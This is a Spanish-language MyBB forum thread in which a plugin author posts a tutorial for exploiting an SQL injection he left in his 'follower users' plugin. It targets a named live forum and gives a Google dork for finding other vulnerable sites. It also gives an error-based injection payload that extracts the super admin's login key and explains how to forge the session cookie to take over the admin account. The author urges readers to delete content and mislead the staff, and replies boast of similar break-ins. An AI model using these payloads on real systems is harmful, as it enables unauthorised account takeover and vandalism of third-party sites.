Deprecated: str_replace(): Passing null to parameter #3 ($subject) of type array|string is deprecated in /var/www/mybb-es.com/html/inc/class_language.php on line 201
Vulnerabilidad Follower Users
Edson Ordaz   24 Dec, 2012, 3:40 pm
#1
Bueno hago este tuto solo para ustedes.. PROHIBIDO PASARLO A OTRO FORO solo es para que ustedes jodan....

Es una de las vulnerabilidades de SuscriberUser (uno de mis plugins) que cuando lo hice le deje agujeros!
Asi como pongo de este plugin despues ponde de otros muchos que encontre en plugins de Mods MyBB!

Lo primero es buscar un foro que tenga el plugins follower users instalado.. por ejemplo yo encontre este foro que no parece MyBB pero si lo es
http://pt.nextgeni.us/index.php
lo primero que debemos hacer es registrarnos (validar usuario e iniciar sesion)yo lo hice con una cuenta llamada Hacked (para ello pues cree un correo no use el mio)..

Bueno el foro no dice cuantos usuarios tiene pero si dan clic en el boton people se daran cuenta que si tiene algo (hice la cuenta de 20 usuarios por 319 pag son mas de 6000)

estando en el memberlist doy clic al primer usuario a mi me aparece el usuario nick tadd entonces en su perfil busco la caja de seguir usuario y damos clic secundario en donde dice Subscribe to this user

[Imagen: NtX8k.png]

TIP* para buscar foros con foloweruser instalado buscamos de la siguiente manera en google
"Users subscribed to" inurl:member.php
recuerden que lo que esta entre comillas o busca tal cual google y el inurl sirve para indicar que esta en ese archivo.

Continuamos entonces SOLO DIMOS CLIC SECUNDARIO no vamos a ir al link en mi caso seria este
Código:
http://pt.nextgeni.us/misc.php?suscriberuser=yes&usid=362&uid=6370
pueden usar ese mismo pero donde dice uid= siempre deben poneer su UID y deben estar logueados de lo contrario mostrar el foro!

En esa parte el USID olvide pasarlo por un intval este intval sirve para convertir un string en entero si este string es un numero lo convierte a ese numero pero en entero y si es texto lo convierte a cero pero como no lo pase por el intval desde ahi hacermos la inyeccion SQL por tanto lo primero que debemos hacer es verificar si es vulnerable ingresando un texto, si es vulnerable debe mostrar error sql por tanto lo haremos de la siguiente manera

Código:
http://pt.nextgeni.us/misc.php?suscriberuser=yes&usid='test&uid=6370

SIEMPRE CAMBIEN EL UID POR SU UID!

como se dan cuenta cambie el usid por 'test y nos da el siguiente resultado

[Imagen: dHqXW.png]

como podemos ver las tablas no tienen el prefijo mybb_ si no ptf_ y si es vulnerable 100%!
Ahora en el error podemos observar tambien esto

Cita:SELECT suid FROM ptf_suscribeusers WHERE uid=''test' AND usid='6370'

por tanto no podemos editar datos de la DB porque no es un update si no un select pero esto nos puede dar cualquier dato de la DB.

Ahora para verificar que nos da datos (y correctos) vamos a empezar a poner en ves de 'test en el usid el siguiente codigo
Cita:' and(select 1 from(select count(*),concat((select username from ptf_users where uid="6370"),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

ovio en ves de 6370 ponen su uid y debe mostrarles su username con un 1 adelante

[Imagen: 5DUdx.png]

si asi lo hace quiere decir que todo va correcto!
Entonces de ahi lo que haremos es cambiar el uid por 1 (para obtener los datos del super admin) y en ves de username vamos a escribir loginkey de la siguiente manera y les debe mostrar el codigo de inicio de sesion del super admin

[Imagen: TTlYI.png]

Y eso es TODO recuerden que es un dato DUPLICADO por tanto siempre mostrara un 1 al final osea que se lo amos a quitar y nuestro resultado es cyxpyRkYfmzrJgzaltEyX12rZGjU6bkKdJ8cWWaXhN36449CgD entonces regresamos a la web sin cerrar sesion como ven aki estoy en mi usuario

[Imagen: q5Upv.png]

ahora vamos a editar nuestras cookies y en la cookie mybbuser la vamos a editar por la del super admin!
La cookie de sesion de MyBB esta compuesta de la siguiente manera UID_LOGINKEY por tanto ponemos 1_cyxpyRkYfmzrJgzaltEyX12rZGjU6bkKdJ8cWWaXhN36449CgD y guardamos

[Imagen: GNREj.png]

como vemos en la imagen puse 3 numeros.
  1. Mi uid y mi loginkey ahi se ven
  2. Editar el valor y puse el uid y el loginkey del super admin
  3. presiono guardar

y listo actualizo la pagina y como veo estoy logueado con el usuario que creo el foro..

[Imagen: U4jr2.png]

y eso es todo no puedne entrar al ADMINCP pero pueden eliminar cosas y hacer pensar al staff como es que entraron a su web..

Esto es simple hay plugins que tienen la vulnerabilidad en el update y pueden editar la DB haciendose admin y pueden entrar con su usuario al admincp!

Luego hago mas tutos!

Saludos putitos!
Cluster   24 Dec, 2012, 5:08 pm
#2
Y asi señores es como nos hackeo night xd


Enviado desde mi iPod touch usando Tapatalk

:)
Edson Ordaz   24 Dec, 2012, 5:21 pm
#3
exactamente.. solo q entro por otro plugin (FI)
Última modificación: 9 Aug, 2013, 8:35 pm por Pomelete.
  
Powered By MyBB, © 2002-2024 MyBB Group.
Made with by Curves UI.